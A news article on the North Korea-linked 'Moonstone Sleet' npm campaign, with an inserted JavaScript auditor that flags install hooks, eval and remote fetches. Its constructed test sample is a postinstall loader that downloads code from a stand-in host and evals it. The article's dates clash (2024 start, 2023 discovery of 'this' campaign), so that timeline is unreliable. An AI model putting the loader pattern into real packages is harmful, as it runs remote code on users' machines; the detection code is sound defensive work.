
North Korea-Linked 'Moonstone Sleet' Cyber Campaign Targets npm Ecosystem

North Korea-linked hackers are exploiting npm packages to infiltrate developer systems. The 'Moonstone Sleet' campaign highlights the urgent need for better security measures in the npm ecosystem.



A sophisticated cyber campaign, dubbed 'Moonstone Sleet', has been targeting the npm ecosystem. It began on August 12, 2024, with malicious packages designed to infiltrate developer environments and steal sensitive data.

The campaign, linked to North Korean threat groups, has seen a recent surge in activity. It involves publishing malicious npm packages that insert JavaScript code to retrieve and execute malicious scripts from remote endpoints like ipcheck[.]cloud.

The packages, including temp-etherscan-api, etherscan-api, and telegram-con, use multi-stage obfuscated JavaScript. The most recent package, sass-notification, published on August 27, 2024, is linked to this campaign. It runs scripts that download, decrypt, and execute remote payloads, including Python scripts and a full Python interpreter. These scripts search for data in cryptocurrency wallet browser extensions and establish persistence on affected systems.
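The loader shape described above (an install-time lifecycle script that fetches, decodes and executes remote code) is something a defender can screen for before a package reaches a build host. The following heuristic auditor is an added example written for this article, not code from the campaign or from any npm tooling; the package metadata and source snippets it scans are constructed for illustration, and the pattern list is an assumption about what such loaders typically contain.

```javascript
// Heuristic audit of an npm package for the multi-stage loader pattern:
// a lifecycle hook plus JavaScript that fetches remote code and executes it.
// Added example; sample package contents below are constructed, not real.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators assumed typical of fetch-decode-execute loaders (not exhaustive).
const RISKY_PATTERNS = [
  { id: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'child-process', re: /require\s*\(\s*['"]child_process['"]\s*\)/ },
  { id: 'remote-fetch', re: /https?:\/\/[^\s'"]+/ },
  { id: 'decode-chain', re: /Buffer\.from\s*\([^)]*['"](base64|hex)['"]\s*\)/ },
];

// pkgJson: parsed package.json; sources: { filename: sourceText }.
// Returns individual findings plus a verdict on whether the combination
// matches the loader shape (hook + remote fetch + code execution).
function auditPackage(pkgJson, sources) {
  const findings = [];
  const scripts = pkgJson.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ where: `scripts.${hook}`, id: 'lifecycle-hook', detail: scripts[hook] });
    }
  }
  for (const [file, code] of Object.entries(sources)) {
    for (const { id, re } of RISKY_PATTERNS) {
      const m = code.match(re);
      if (m) findings.push({ where: file, id, detail: m[0] });
    }
  }
  const ids = new Set(findings.map((f) => f.id));
  const loaderShape = ids.has('lifecycle-hook') && ids.has('remote-fetch')
    && (ids.has('dynamic-eval') || ids.has('child-process'));
  return { findings, loaderShape };
}

// Constructed sample: a postinstall hook that pulls and evals a remote stage.
const samplePkg = { name: 'example-pkg', version: '1.0.0', scripts: { postinstall: 'node setup.js' } };
const sampleSources = {
  'setup.js': "const https = require('https');\n" +
    "const cp = require('child_process');\n" +
    "https.get('https://example.invalid/stage2', (r) => { let d = ''; r.on('data', (c) => d += c);\n" +
    "  r.on('end', () => eval(Buffer.from(d, 'base64').toString())); });",
};
// Constructed benign package for comparison: no hooks, no network, no eval.
const benignPkg = { name: 'benign', version: '1.0.0', scripts: { test: 'node test.js' } };
const benignSources = { 'index.js': 'module.exports = (a, b) => a + b;' };

console.log(JSON.stringify(auditPackage(samplePkg, sampleSources), null, 2));
```

A hit on the combined verdict is a reason to quarantine the package for manual review, not proof of compromise; obfuscated loaders may evade the regexes, so treat this as a first-pass triage filter.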

Microsoft first published the discovery of this coordinated campaign in July 2023. The qq-console package is attributed to a known North Korean campaign named 'Contagious Interview'.

The 'Moonstone Sleet' campaign highlights the increasing exploitation of npm by threat actors to compromise developer systems. It underscores the need for vigilance and robust security measures in the npm ecosystem.
